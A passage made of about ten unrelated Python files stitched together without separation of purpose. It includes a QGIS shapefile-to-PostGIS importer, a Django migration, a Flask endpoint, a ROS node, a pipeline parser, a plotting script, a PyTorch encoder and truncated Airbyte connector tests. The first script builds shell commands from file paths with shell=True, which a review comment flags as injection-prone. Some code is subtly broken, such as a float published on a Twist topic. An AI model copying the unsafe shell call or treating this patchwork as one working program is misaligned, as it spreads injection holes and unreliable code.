        # layer.crs().authid() returns e.g. 'EPSG:2154'; keep the numeric code.
        exp_crs=str(layer.crs().authid().split(':')[1])
        # Written to the summary file to flag a successful import ('oui').
        imp='oui'
        if sys.platform == 'win32':
            # File name without extension, extracted from the path.
            namefile=shape_path.split('\\')[len(shape_path.split('\\'))-1].split('.')[0]
            # Make the PostGIS binaries reachable.
            os.environ['PATH'] = pathpg
            # shp2pgsql command; psql connects using the PG* env vars set above.
            cmds = 'shp2pgsql.exe -I -s %s: "%s" %s.%s | psql ' % (exp_crs, shape_path, shem, namefile)
            # SECURITY(review): shell=True with paths interpolated into the
            # command line -- only safe for trusted local directories.
            subprocess.call(cmds, shell=True)
        elif sys.platform == 'linux2':
            # Same logic with unix path separators.
            namefile=shape_path.split('/')[len(shape_path.split('/'))-1].split('.')[0]
            cmds = 'shp2pgsql -I -s %s: "%s" %s.%s | psql ' % (exp_crs, shape_path, shem, namefile)
            subprocess.call(cmds, shell=True)
    # Non-UTF-8 (or unknown) encoding: skip the file and record the failure.
    elif encoding is None or encoding != 'UTF-8':
        print 'Fichier %s n''est pas en UTF-8' %shape_path
        imp='NON- VERIFIER ENCODAGE (UTF-8 OBLIGATOIRE - .cpg probablement ABSENT)'
    # Record the shapefile path and whether it was imported ('oui'/'NON...').
    WriteFile(FichierTxt,"{0},{1}" .format(shape_path,imp))
# Open the summary file with the platform's default tool.
if sys.platform == 'win32':
    os.popen("%s" %FichierTxt)
elif sys.platform == 'linux2':
    os.system('gnome-open %s' %FichierTxt)
# Generated by Django 3.1.3 on 2020-12-12 16:23
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema for the site's content models.

    NOTE: auto-generated by Django 3.1.3; edit the app's models and re-run
    `makemigrations` instead of hand-editing the operations below.
    All `logo` ImageFields store uploads under MEDIA_ROOT/'upload'; the
    `rating` IntegerFields default to 0.
    """

    # First migration of this app: nothing to depend on.
    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='About',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=300)),
                ('description', models.TextField()),
                ('logo', models.ImageField(upload_to='upload')),
            ],
        ),
        migrations.CreateModel(
            name='Certificate',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=300)),
                ('logo', models.ImageField(upload_to='upload')),
                ('rating', models.IntegerField(default=0)),
            ],
        ),
        migrations.CreateModel(
            name='Contact',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=300)),
                ('phone', models.CharField(max_length=300)),
                ('address', models.CharField(max_length=300)),
                ('email', models.EmailField(max_length=300)),
                # Social links are optional (blank=True).
                ('facebook', models.CharField(blank=True, max_length=300)),
                ('google', models.CharField(blank=True, max_length=300)),
                ('twitter', models.CharField(blank=True, max_length=300)),
                ('skype', models.CharField(blank=True, max_length=300)),
            ],
        ),
        migrations.CreateModel(
            name='Doctor',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('logo', models.ImageField(upload_to='upload')),
                ('last_name', models.CharField(max_length=300)),
                ('first_name', models.CharField(max_length=300)),
                ('position', models.CharField(max_length=300)),
            ],
        ),
        migrations.CreateModel(
            name='Faq',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('icon', models.CharField(max_length=300)),
                ('title', models.CharField(max_length=300)),
                ('description', models.CharField(max_length=300)),
                ('rating', models.IntegerField(default=0)),
            ],
        ),
        migrations.CreateModel(
            name='Glavniy',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('mini1_description', models.CharField(blank=True, max_length=300)),
                ('title', models.CharField(max_length=300)),
                ('mini2_description', models.CharField(blank=True, max_length=300)),
                ('mini3_description', models.CharField(blank=True, max_length=300)),
                ('rating', models.IntegerField(default=0)),
            ],
        ),
        migrations.CreateModel(
            name='Information',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=300)),
                ('short_description', models.CharField(blank=True, max_length=300)),
                ('description', models.TextField()),
                ('short_description1', models.CharField(blank=True, max_length=300)),
                ('short_description2', models.CharField(blank=True, max_length=300)),
                ('short_description3', models.CharField(blank=True, max_length=300)),
                ('short_description4', models.CharField(blank=True, max_length=300)),
            ],
        ),
        migrations.CreateModel(
            name='Latest',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('mini_description', models.CharField(max_length=300)),
                ('logo', models.ImageField(upload_to='upload')),
                ('data', models.DateField()),
                ('comment', models.IntegerField(default=0)),
                ('title', models.CharField(max_length=300)),
                ('name', models.CharField(max_length=300)),
                ('description', models.CharField(max_length=300)),
                ('rating', models.IntegerField(default=0)),
            ],
        ),
        migrations.CreateModel(
            name='Opening',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=300)),
                ('description', models.CharField(max_length=300)),
            ],
        ),
        migrations.CreateModel(
            name='Partner',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=300)),
                ('logo', models.ImageField(upload_to='upload')),
                ('rating', models.IntegerField(default=0)),
            ],
        ),
        migrations.CreateModel(
            name='Prize',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=300)),
                ('mini_description', models.CharField(max_length=300)),
                ('status', models.IntegerField(default=0)),
                ('short_description', models.CharField(max_length=300)),
            ],
        ),
        migrations.CreateModel(
            name='Register',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=300)),
                ('phone', models.CharField(max_length=300)),
                ('email', models.EmailField(blank=True, max_length=300)),
                ('data', models.DateField()),
                ('time', models.TimeField()),
                ('description', models.CharField(max_length=300)),
            ],
        ),
        migrations.CreateModel(
            name='Staff',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=300)),
                ('description', models.CharField(max_length=300)),
                ('logo', models.ImageField(upload_to='upload')),
                ('last_name', models.CharField(max_length=300)),
                ('first_name', models.CharField(max_length=300)),
                ('position', models.CharField(max_length=300)),
                ('rating', models.IntegerField(default=0)),
            ],
        ),
        migrations.CreateModel(
            name='Success',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('mini_description', models.CharField(max_length=300)),
                ('last_name', models.CharField(max_length=300)),
                ('first_name', models.CharField(max_length=300)),
                ('position', models.CharField(max_length=300)),
                ('rating', models.IntegerField(default=0)),
                ('logo_left', models.ImageField(upload_to='upload')),
                ('logo_right', models.ImageField(upload_to='upload')),
            ],
        ),
        migrations.CreateModel(
            name='Test',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('mini_description', models.CharField(max_length=300)),
                ('logo', models.ImageField(upload_to='upload')),
                ('short_description', models.CharField(max_length=300)),
                ('last_name', models.CharField(max_length=300)),
                ('first_name', models.CharField(max_length=300)),
                ('position', models.CharField(max_length=300)),
                ('rating', models.IntegerField(default=0)),
            ],
        ),
        migrations.CreateModel(
            name='Tip',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('logo', models.ImageField(upload_to='upload')),
                ('title', models.CharField(max_length=300)),
                ('mini_description', models.CharField(max_length=300)),
            ],
        ),
    ]
|
from flask import Flask, request, jsonify, make_response
from flask_cors import cross_origin
from datetime import datetime
from dateparser import parse
import holiday_controller as hc
# Flask application instance used by the route decorators below.
app: Flask = Flask(__name__)
@app.route('/holiday', methods=['POST'])
@cross_origin()
def calculate_pay():
    """POST /holiday: parse the request's date and CSV and return the
    holiday controller's result as a JSON response."""
    payload = request.json
    # Date of the holiday, parsed from the request body.
    holiday_date: datetime = parse(payload['date'])
    # Raw CSV data accompanying the date.
    csv_data: str = payload['csv']
    # Delegate the actual computation to the holiday controller.
    return jsonify(hc.process_csv(holiday_date, csv_data))
# Run the Flask development server when executed directly.
if __name__ == '__main__':
    app.run()
|
#!/usr/bin/env python
# license removed for brevity
import rospy
from std_msgs.msg import String
# Fixed import paths: the ROS message packages are geometry_msgs.msg and
# sensor_msgs.msg (the original "geometry.msgs" / "sensor.msgs" do not exist).
from geometry_msgs.msg import Twist, Vector3
from sensor_msgs.msg import LaserScan
def getch():
    """Block until one key is typed and return that single character.

    Switches the controlling terminal into raw mode for the read and
    restores the previous settings afterwards, even if the read fails.
    """
    import sys, tty, termios
    stdin_fd = sys.stdin.fileno()
    saved_attrs = termios.tcgetattr(stdin_fd)
    try:
        tty.setraw(stdin_fd)
        key = sys.stdin.read(1)
    finally:
        # Always restore cooked mode so the shell is left usable.
        termios.tcsetattr(stdin_fd, termios.TCSADRAIN, saved_attrs)
    return key
def scan_received(msg, pub):
    """Proportional distance-keeping controller for one laser scan.

    Averages the plausible readings (0 < r < 8) among the first five range
    beams, computes the error against the desired 1 m distance, publishes
    the proportional velocity on `pub` and returns it.  When no reading in
    the window is valid, 0.0 is published and returned.
    """
    print("scan received")  # was a Python-2 print statement
    desired_distance = 1
    gain = 5  # proportional gain
    vel = 0.0
    # Keep only plausible readings from the first five beams; slicing also
    # avoids the IndexError the old range(5) loop hit on short scans.
    valid_ranges = [r for r in msg.ranges[:5] if 0 < r < 8]
    if valid_ranges:
        mean_distance = sum(valid_ranges) / float(len(valid_ranges))
        error = mean_distance - desired_distance
        vel = gain * error
    # NOTE(review): publishes a bare float although the publisher in teleop()
    # is declared for Twist messages -- confirm the intended message type.
    pub.publish(vel)
    return vel
def teleop():
    """Start the distance-keeping node and keep it alive.

    The velocity command is computed and published by scan_received() every
    time a LaserScan arrives on 'scan'; this function only wires the node
    together and idles at 10 Hz until shutdown.
    """
    # Register the node first: rospy expects init_node before pub/sub setup.
    rospy.init_node('talker', anonymous=True)
    pub = rospy.Publisher('cmd_vel', Twist, queue_size=10)
    # The publisher is handed to the callback as its extra argument.
    rospy.Subscriber('scan', LaserScan, scan_received, pub)
    rate = rospy.Rate(10)  # 10 Hz
    while not rospy.is_shutdown():
        # The original loop body referenced undefined names (`vel`, `msg`)
        # and raised NameError at runtime; the dead commented-out keyboard
        # teleop code (with invalid `if ch='u'` syntax) has been removed.
        rate.sleep()
# Entry point: run the node, silently ignoring the interrupt ROS raises on shutdown.
if __name__ == '__main__':
    try:
        teleop()
    except rospy.ROSInterruptException: pass
import os
import sys
import re
import subprocess
import shlex
import fcntl
import time
class Parser:
    """Parse a pipeline-definition document into `pipes` and `main`.

    The document has two kinds of sections::

        pipes <namespace>:        # opens a namespace of pipe definitions
          <name>:                 # a pipe (exactly 2-space indent)
            <type> <path> [args]  # its definition (exactly 4-space indent)

        main:                     # chains of steps joined by '->'
          ns.pipe(arg=value) [:: var] [&]

    Results:
      self.pipes -- {namespace: {'line': n, 'pipes': {name: {'line', 'type',
                     'path', 'args'}}}}
      self.main  -- list of chains; each chain is a list of step dicts with
                    keys type/namespace/func/line/value/args/thread.

    Any syntax error prints a numbered diagnostic and exits the process.
    """

    def __init__(self, data, debug=False):
        self.data = data                # iterable of document lines
        self.line_number = 0            # 1-based line counter for diagnostics
        self.pipes = {}                 # namespace -> pipe definitions
        self.main = []                  # parsed main chains
        self.capture_pipes = False      # currently inside a `pipes ...:` section
        self.capture_main = False       # currently inside the `main:` section
        self.namespace = ''             # namespace being parsed / referenced
        self.namespace_def = ''         # pipe name being parsed
        self.debug = debug
        self._parse()

    def _error(self, enumber, msg):
        """Print a numbered parser error with the current line, then exit."""
        print('E-PARSER(%d): Line %d: %s' % (enumber, self.line_number, msg))
        sys.exit(1)

    def _parse_pipes(self, line):
        """Detect a `pipes <namespace>:` header and open that namespace."""
        if not re.search(r'^pipes .*:$', line):
            return False
        self.capture_pipes = True
        self.namespace = re.sub(r'^pipes ', '', line).replace(':', '').strip()
        if self.namespace in self.pipes:
            # BUG FIX: the original referenced the bare name `pipes`, raising
            # NameError instead of reporting the duplicate namespace.
            self._error(1, 'Namespace previously defined on line %d: %s' % (
                self.pipes[self.namespace]['line'], self.namespace))
        self.pipes[self.namespace] = {'line': self.line_number, 'pipes': {}}
        return True

    def _capture_pipes(self, line):
        """Consume one line inside a `pipes` section (pipe names/definitions)."""
        if not self.capture_pipes or not self.namespace:
            return False
        if line.strip() == '':
            return True
        # Pipe name: exactly two spaces of indent, then `name:`
        if re.search(r'^  [0-9a-zA-Z_-]+:$', line):
            self.namespace_def = line.strip().split(':')[0]
            self.pipes[self.namespace]['pipes'][self.namespace_def] = {
                'line': self.line_number, 'type': None, 'path': None, 'args': []}
        # Pipe definition: four spaces of indent, then `type path [args...]`
        elif re.search(r'^    [a-zA-Z0-9]', line):
            try:
                # `split` raises ValueError when there are fewer fields; the
                # original used bare `except:` which also hid real errors.
                (dtype, dpath, dargs) = line.strip().split(' ', 2)
                dargs = dargs.split(' ')
            except ValueError:
                try:
                    (dtype, dpath) = line.strip().split(' ', 1)
                    dargs = []
                except ValueError:
                    self._error(2, 'Failed to parse namespace.pipe definition "%s.%s":\n\t"%s"' % (
                        self.namespace, self.namespace_def, line))
            self.pipes[self.namespace]['pipes'][self.namespace_def]['type'] = dtype
            self.pipes[self.namespace]['pipes'][self.namespace_def]['path'] = dpath
            self.pipes[self.namespace]['pipes'][self.namespace_def]['args'] = dargs
        else:
            # Anything else ends the pipes section; let other handlers try it.
            self.capture_pipes = False
        return self.capture_pipes

    def _parse_main(self, line):
        """Detect the `main:` header and switch into main-chain capture."""
        if not re.search(r'^main:$', line.strip()):
            return False
        self.capture_pipes = False
        self.capture_main = True
        return True

    def _capture_main(self, line):
        """Parse one `a -> b -> c` chain line inside the `main:` section."""
        if not self.capture_main:
            return False
        parts = line.split('->')
        chain = []
        for part in parts:
            if part.strip() == '':
                continue
            if '.' in part:
                # Pipe invocation: ns.func(arg=value, ...) [:: var] [&]
                (self.namespace, self.func) = part.strip().split('::', 1)[0].split('.', 1)
                self.func = self.func.strip()
                args = []
                if '(' in part:
                    self.func = self.func.split('(', 1)[0]
                    args = part.split('(', 1)[1]
                    args = re.sub(r'\) |\) &|\)$', '', args)
                    args = args.split(', ')
                threaded = False
                if re.search(r'.*&$', self.func):
                    self.func = self.func.rsplit('&', 1)[0].strip()
                    threaded = True
                if not self.namespace in self.pipes:
                    self._error(3, 'Failed to find namespace %s with pipe %s' % (self.namespace, self.func))
                # Validate the call's arguments against the pipe definition.
                dargs = []   # argument names seen in the call
                aargs = []   # [name, value] pairs for the chain entry
                for arg in args:
                    if not '=' in arg:
                        self._error(4, 'Invalid argument format. Expected arg=value:\n\t"%s"' % (line))
                    aargs.append(arg.split('::')[0].strip().split('='))
                    arg = arg.split('=')[0]
                    dargs.append(arg)
                    if not self.func in self.pipes[self.namespace]['pipes']:
                        self._error(11, 'Could not find pipe "%s" in namespace "%s":\n\t"%s"' % (
                            self.func, self.namespace, line))
                    if not arg in self.pipes[self.namespace]['pipes'][self.func]['args']:
                        self._error(5, 'Invalid argument name "%s" to %s.%s:\n\t"%s"' % (
                            arg, self.namespace, self.func, line))
                # Check for arguments the definition requires but the call omits.
                for arg in self.pipes[self.namespace]['pipes'][self.func]['args']:
                    if arg == '*':
                        continue  # wildcard definition accepts anything
                    if not arg in dargs:
                        self._error(6, 'Missing argument named "%s" to %s.%s:\n\t"%s"' % (
                            arg, self.namespace, self.func, line))
                d = {'type': 'pipe', 'namespace': self.namespace, 'func': self.func, 'line': self.line_number,
                     'value': None, 'args': aargs, 'thread': threaded}
                chain.append(d)
            elif not '.' in part and not '(' in part:
                # Bare variable reference, or the special `wait` keyword.
                var = part.strip()
                if var == 'wait':
                    thread_wait = 'wait'
                else:
                    thread_wait = False
                d = {'type': 'var', 'namespace': None, 'func': None, 'value': var, 'line': self.line_number,
                     'args': None, 'thread': thread_wait}
                # A variable starting a chain must have been assigned earlier.
                if len(chain) < 1 and var != 'wait':
                    found = False
                    for m in self.main:
                        for x in m:
                            if x['type'] == 'var' and x['value'] == var:
                                found = True
                    if not found:
                        self._error(7, 'Could not find previously defined variable named "%s":\n\t"%s"' % (var, line))
                chain.append(d)
            else:
                self._error(8, 'Parser error:\n\t"%s"\n\t"%s"' % (line, part))
            # Capture a `:: var` assignment following the step.
            if '::' in part:
                var = part.split('::')[1].strip()
                var = var.split(' ')[0]
                d = {'type': 'var', 'namespace': None, 'func': None, 'value': var, 'line': self.line_number,
                     'args': None, 'thread': False}
                chain.append(d)
                if re.search(r'&$', part):
                    # Trailing `&` after an assignment marks it threaded.
                    d = {'type': 'var', 'thread': True, 'namespace': None, 'func': None, 'value': None,
                         'line': self.line_number, 'args': None}
                    chain.append(d)
        if chain:
            self.main.append(chain)
        return True

    def _parse(self):
        """Dispatch every input line to the section handlers, in order."""
        for line in self.data:
            self.line_number += 1
            if re.search(r'^(\s+)?#', line):
                continue  # comment line
            if self._parse_pipes(line): continue
            if self._capture_pipes(line): continue
            if self._parse_main(line): continue
            if self._capture_main(line): continue
            if line.strip() != '':
                # _error() exits the process; the old extra sys.exit(1)
                # after this call was unreachable and has been dropped.
                self._error(9, 'Invalid format:\n\t"%s"' % (line))
|
import ComputerPlayer as cp
class HumanPlayer(cp.ComputerPlayer):
    """Human player: translates UI events from the game into board plays."""

    def __init__(self, game, board):
        super().__init__(game, board)

    def __str__(self):
        return f"{self.__class__.__name__}: WhatStrategy Dunno"

    def taketurn(self, event=None):
        """Apply one (display, color, row) event to the board."""
        import FinalBoardComponent as fbc
        assert event is not None
        disp, color = event[0], event[1]
        # Clamp the row into the board's valid range; it is unclear how an
        # out-of-range value could arrive, but guard against it anyway.
        max_row = fbc.FinalBoardComponent.dimension - 1
        row = min(max(0, int(event[2])), max_row)
        tiles = self.game.chooseoption(disp, color)
        self.board.playtiles(row, tiles)
|
import json
import pickle
import matplotlib.pyplot as plt
import numpy as np
# Snakemake script: plot cumulative distributions of first-passage times
# (recapture and exit) for DSB ends, in simulation units and in minutes.

# Unit-conversion factors (seconds per simulation dt, nm per monomer).
with open(snakemake.input.units_file,'r') as infile:
    units_file = json.load(infile)
# Pickled first-passage interval data keyed by contact radius.
with open(snakemake.input.first_passage_times_v2,'rb') as infile:
    passage_times = pickle.load(infile)
no_contact_intervals = passage_times['no_contact_intervals']
with_contact_intervals = passage_times['with_contact_intervals']
color_list =['dodgerblue', 'orangered','limegreen','magenta']
# Contact radii (in monomers) configured for the first-passage analysis.
R = snakemake.config['DSB_simulation_parameters']['contact_radii_for_first_passage_times']
loop_size = ['all'] # loop size in which DSB occurs, in the unit of # monomers
# Minutes per simulation step and nanometers per monomer.
dt_min = units_file['seconds_per_sim_dt']['internal TAD']/60
dx_nm = units_file['nanometers_per_monomer']['internal TAD']
first_protein_arrival_time = 1/dt_min # use ku70/80 arrival time to estimate when the two DSB ends become sticky (in simulation time unit)
# Logarithmically spaced histogram bin edges: 1..9, 10..90, ..., 100000..900000.
bin_edge_0 = np.arange(1,10)
bin_edge= np.hstack((bin_edge_0,bin_edge_0*10,bin_edge_0*100,bin_edge_0*1000,bin_edge_0*10000,bin_edge_0*100000))
bin_edge=bin_edge.tolist()
# Probe the data layout: older pickles are keyed [radius][trajectory],
# newer ones [radius][loop_size][trajectory].  A KeyError on the loop-size
# level selects the flat-layout branch below.
try:
    x = no_contact_intervals[R[0]][loop_size[0]][0]
except KeyError:
    # --- flat layout: intervals keyed [radius][trajectory] ---
    plt.figure(figsize=(8,5*len(R)))
    for ri, r in enumerate(R):
        # first need to consolidate all the times
        intervals = []
        for idx in no_contact_intervals[r].keys():
            intervals.extend(no_contact_intervals[r][idx])
        # now, create histograms (left column: simulation units)
        plt.subplot(len(R)+1,2,ri*2+1)
        min_len = 0
        plt.hist([i for i in intervals if i>min_len],bins=bin_edge,
            cumulative=True,density=True,histtype='step',label=f'Radius {r} (monomers)')
        plt.xscale('log')
        plt.xlabel('Time to recapture (sim units)')
        plt.ylabel('Cumulative probability')
        plt.ylim([0,1])
        if len(intervals)>0:
            plt.xlim([first_protein_arrival_time,np.max(intervals)+1])
        plt.legend(loc='lower right')
        # right column: same data converted to minutes
        plt.subplot(len(R)+1,2,ri*2+2)
        plt.hist([i*dt_min for i in intervals if i>min_len],bins=bin_edge,
            cumulative=True,density=True,histtype='step', label=f'Radius {int(r*dx_nm)} nm')
        plt.xscale('log')
        plt.xlabel('Time to recapture (minutes)')
        plt.ylim([0,1])
        if len(intervals)>0:
            plt.xlim([1,(np.max(intervals)+1)*dt_min])
        plt.legend(loc='lower right')
    plt.savefig(snakemake.output.first_recapture_v2,bbox_inches='tight')
    # Same plots for the time spent in contact (first exit times).
    plt.figure(figsize=(8,5*len(R)))
    for ri, r in enumerate(R):
        # first need to consolidate all the times
        intervals = []
        for idx in with_contact_intervals[r].keys():
            intervals.extend(with_contact_intervals[r][idx])
        # now, create histograms
        plt.subplot(len(R)+1,2,ri*2+1)
        min_len = 0
        plt.hist([i for i in intervals if i>min_len],bins=bin_edge,
            cumulative=True,density=True,histtype='step',label=f'Radius {r} (monomers)')
        plt.xscale('log')
        plt.xlabel('Time to exit (sim units)')
        plt.ylabel('Cumulative probability')
        plt.ylim([0,1])
        if len(intervals)>0:
            plt.xlim([first_protein_arrival_time,np.max(intervals)+1])
        plt.legend(loc='lower right')
        plt.subplot(len(R)+1,2,ri*2+2)
        plt.hist([i*dt_min for i in intervals if i>min_len],bins=bin_edge,
            cumulative=True,density=True,histtype='step', label=f'Radius {int(r*dx_nm)} nm')
        plt.xscale('log')
        plt.xlabel('Time to exit (minutes)')
        plt.ylim([0,1])
        if len(intervals)>0:
            plt.xlim([1,(np.max(intervals)+1)*dt_min])
        plt.legend(loc='lower right')
    plt.savefig(snakemake.output.first_exit_v2,bbox_inches='tight')
else:
    # --- nested layout: intervals keyed [radius][loop_size][trajectory] ---
    plt.figure(figsize=(8*len(loop_size),6.8*len(R)))
    for ri, r in enumerate(R):
        for li,l in enumerate(loop_size):
            # first need to consolidate all the times
            intervals = []
            for idx in no_contact_intervals[r][l].keys():
                intervals.extend(no_contact_intervals[r][l][idx])
            # now, create histograms (per radius x loop-size panel)
            plt.subplot(len(R)+1,2*len(loop_size),li*2+ri*2*len(loop_size)+1)
            min_len = 0
            plt.hist([i for i in intervals if i>min_len],bins=bin_edge,
                cumulative=True,density=True,histtype='step',label=f'Radius {r} (monomers)',color=color_list[li])
            plt.xscale('log')
            plt.xlabel('Time to recapture (sim units)')
            plt.ylabel('Cumulative probability')
            plt.ylim([0,1])
            plt.xlim([first_protein_arrival_time,np.max(intervals)+1])
            plt.legend(loc='lower right')
            plt.title('loop size: '+ str(l)+ ' monomers')
            plt.subplot(len(R)+1,2*len(loop_size),li*2+ri*2*len(loop_size)+2)
            plt.hist([i*dt_min for i in intervals if i>min_len],bins=bin_edge,
                cumulative=True,density=True,histtype='step', label=f'Radius {int(r*dx_nm)} nm',color=color_list[li])
            plt.xscale('log')
            plt.xlabel('Time to recapture (minutes)')
            plt.ylim([0,1])
            plt.xlim([1,(np.max(intervals)+1)*dt_min])
            plt.legend(loc='lower right')
            plt.title('loop size: '+ str(l)+ ' monomers')
    plt.savefig(snakemake.output.first_recapture_v2,bbox_inches='tight')
    # Same nested plots for first exit times.
    plt.figure(figsize=(8*len(loop_size),6.8*len(R)))
    for ri, r in enumerate(R):
        for li,l in enumerate(loop_size):
            # first need to consolidate all the times
            intervals = []
            for idx in with_contact_intervals[r][l].keys():
                intervals.extend(with_contact_intervals[r][l][idx])
            # now, create histograms
            plt.subplot(len(R)+1,2*len(loop_size),li*2+ri*2*len(loop_size)+1)
            min_len = 0
            plt.hist([i for i in intervals if i>min_len],bins=bin_edge,
                cumulative=True,density=True,histtype='step',label=f'Radius {r} (monomers)',color=color_list[li])
            plt.xscale('log')
            plt.xlabel('Time to exit (sim units)')
            plt.ylabel('Cumulative probability')
            plt.ylim([0,1])
            plt.xlim([first_protein_arrival_time,np.max(intervals)+1])
            plt.legend(loc='lower right')
            plt.title('loop size: '+ str(l)+ ' monomers')
            plt.subplot(len(R)+1,2*len(loop_size),li*2+ri*2*len(loop_size)+2)
            plt.hist([i*dt_min for i in intervals if i>min_len],bins=bin_edge,
                cumulative=True,density=True,histtype='step', label=f'Radius {int(r*dx_nm)} nm',color=color_list[li])
            plt.xscale('log')
            plt.xlabel('Time to exit (minutes)')
            plt.ylim([0,1])
            plt.xlim([1,(np.max(intervals)+1)*dt_min])
            plt.legend(loc='lower right')
            plt.title('loop size: '+ str(l)+ ' monomers')
    plt.savefig(snakemake.output.first_exit_v2,bbox_inches='tight')
#Write a function rev_string(my_str) that uses a stack to reverse the characters in a string.
class Stack:
    """Minimal LIFO stack of characters used by rev_string().

    Items are stored in push order; str() renders them most-recently-pushed
    first, matching the original front-insert layout, so callers relying on
    str(stack) see identical output.
    """

    def __init__(self):
        # Underlying storage, oldest item first.
        self.item = []

    def push(self, item):
        # O(1) append instead of the original O(n) insert(0, ...).
        self.item.append(item)

    def pop(self):
        """Remove and return the most recently pushed item (new, backward-compatible)."""
        return self.item.pop()

    def __str__(self):
        # Most recent first: str() of the pushed characters is the reverse
        # of their push order -- exactly what rev_string() relies on.
        return ''.join(reversed(self.item))
def rev_string(my_str):
    """Return a Stack whose str() form is `my_str` reversed.

    Each character is pushed in order; the stack's LIFO rendering then
    yields the reversed string via str().
    """
    reverse = Stack()
    for ch in my_str:
        reverse.push(ch)
    return reverse


# Parenthesized call (was a Python-2 `print` statement); works on 2 and 3.
print(rev_string('helloworld'))
|
import torch
import torch.nn as nn
from torch import optim
import torch.nn.functional as F
from params import *
class EncoderCNN(nn.Module):
    """Two-layer 1-D convolutional encoder over embedded token sequences.

    Embeds token ids to 2*hidden_size, applies two kernel-3 convolutions
    (padding 1, so sequence length is preserved) with ReLU after each, and
    sums the result over dim 0.
    """

    def __init__(self, input_size, hidden_size):
        super(EncoderCNN, self).__init__()
        self.hidden_size = hidden_size
        self.embedding = nn.Embedding(input_size, 2 * hidden_size)
        self.conv1 = nn.Conv1d(2 * hidden_size, hidden_size, kernel_size=3, padding=1)
        self.conv2 = nn.Conv1d(hidden_size, hidden_size, kernel_size=3, padding=1)

    def forward(self, x):
        """x: (batch, seq) long tensor of token ids -> (1, seq, hidden_size)."""
        batch_size, seq_len = x.size()
        emb = self.embedding(x)
        # Conv1d expects (batch, channels, seq); transpose in and back out.
        h = self.conv1(emb.transpose(1, 2)).transpose(1, 2)
        h = F.relu(h.contiguous().view(-1, h.size(-1))).view(batch_size, seq_len, h.size(-1))
        h = self.conv2(h.transpose(1, 2)).transpose(1, 2)
        h = F.relu(h.contiguous().view(-1, h.size(-1))).view(batch_size, seq_len, h.size(-1))
        # NOTE(review): sums over dim=0 (the batch dimension), pooling the
        # whole batch into one sequence -- confirm dim=0 rather than dim=1
        # (sequence) is intended.
        return torch.sum(h, dim=0, keepdim=True)
|
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
from datetime import datetime
from unittest import mock
import pendulum
import pytest
import requests
from pydantic import BaseModel
from source_klaviyo.streams import Events, IncrementalKlaviyoStream, KlaviyoStream, ReverseIncrementalKlaviyoStream
START_DATE = pendulum.datetime(2020, 10, 10)
class SomeStream(KlaviyoStream):
    """Minimal concrete KlaviyoStream used as a test double."""

    # Schema content is irrelevant here; a spec'd mock satisfies the API.
    schema = mock.Mock(spec=BaseModel)

    def path(self, **kwargs) -> str:
        """Endpoint sub-path appended to the API base URL."""
        return "sub_path"
class SomeIncrementalStream(IncrementalKlaviyoStream):
    """Minimal concrete IncrementalKlaviyoStream used as a test double."""

    schema = mock.Mock(spec=BaseModel)
    # Field used as the incremental cursor in state handling.
    cursor_field = "updated_at"

    def path(self, **kwargs) -> str:
        """Endpoint sub-path appended to the API base URL."""
        return "sub_path"
class SomeReverseIncrementalStream(ReverseIncrementalKlaviyoStream):
    """Minimal concrete ReverseIncrementalKlaviyoStream used as a test double."""

    schema = mock.Mock(spec=BaseModel)
    # Field used as the incremental cursor in state handling.
    cursor_field = "updated_at"

    def path(self, **kwargs) -> str:
        """Endpoint sub-path appended to the API base URL."""
        return "sub_path"
@pytest.fixture(name="response")
def response_fixture(mocker):
    """A requests.Response mock; tests set `.json.return_value` as needed."""
    return mocker.Mock(spec=requests.Response)
class TestKlaviyoStream:
    """Unit tests for the base KlaviyoStream via the SomeStream double."""

    @pytest.mark.parametrize(
        ["response_json", "next_page_token"],
        [
            ({"end": 108, "total": 110, "page": 0}, {"page": 1}),  # first page
            ({"end": 108, "total": 110, "page": 9}, {"page": 10}),  # has next page
            ({"end": 109, "total": 110, "page": 9}, None),  # last page
        ],
    )
    def test_next_page_token(self, response, response_json, next_page_token):
        """Pagination advances by page number until `end` reaches `total` - 1."""
        response.json.return_value = response_json
        stream = SomeStream(api_key="some_key")
        result = stream.next_page_token(response)
        assert result == next_page_token

    @pytest.mark.parametrize(
        ["next_page_token", "expected_params"],
        [
            ({"page": 10}, {"api_key": "some_key", "count": 100, "page": 10}),
            (None, {"api_key": "some_key", "count": 100}),
        ],
    )
    def test_request_params(self, next_page_token, expected_params):
        """Query params carry the API key, page size and optional page token."""
        stream = SomeStream(api_key="some_key")
        result = stream.request_params(stream_state={}, next_page_token=next_page_token)
        assert result == expected_params

    def test_parse_response(self, response):
        """Records come straight from the response's `data` array."""
        response.json.return_value = {"data": [1, 2, 3, 4, 5]}
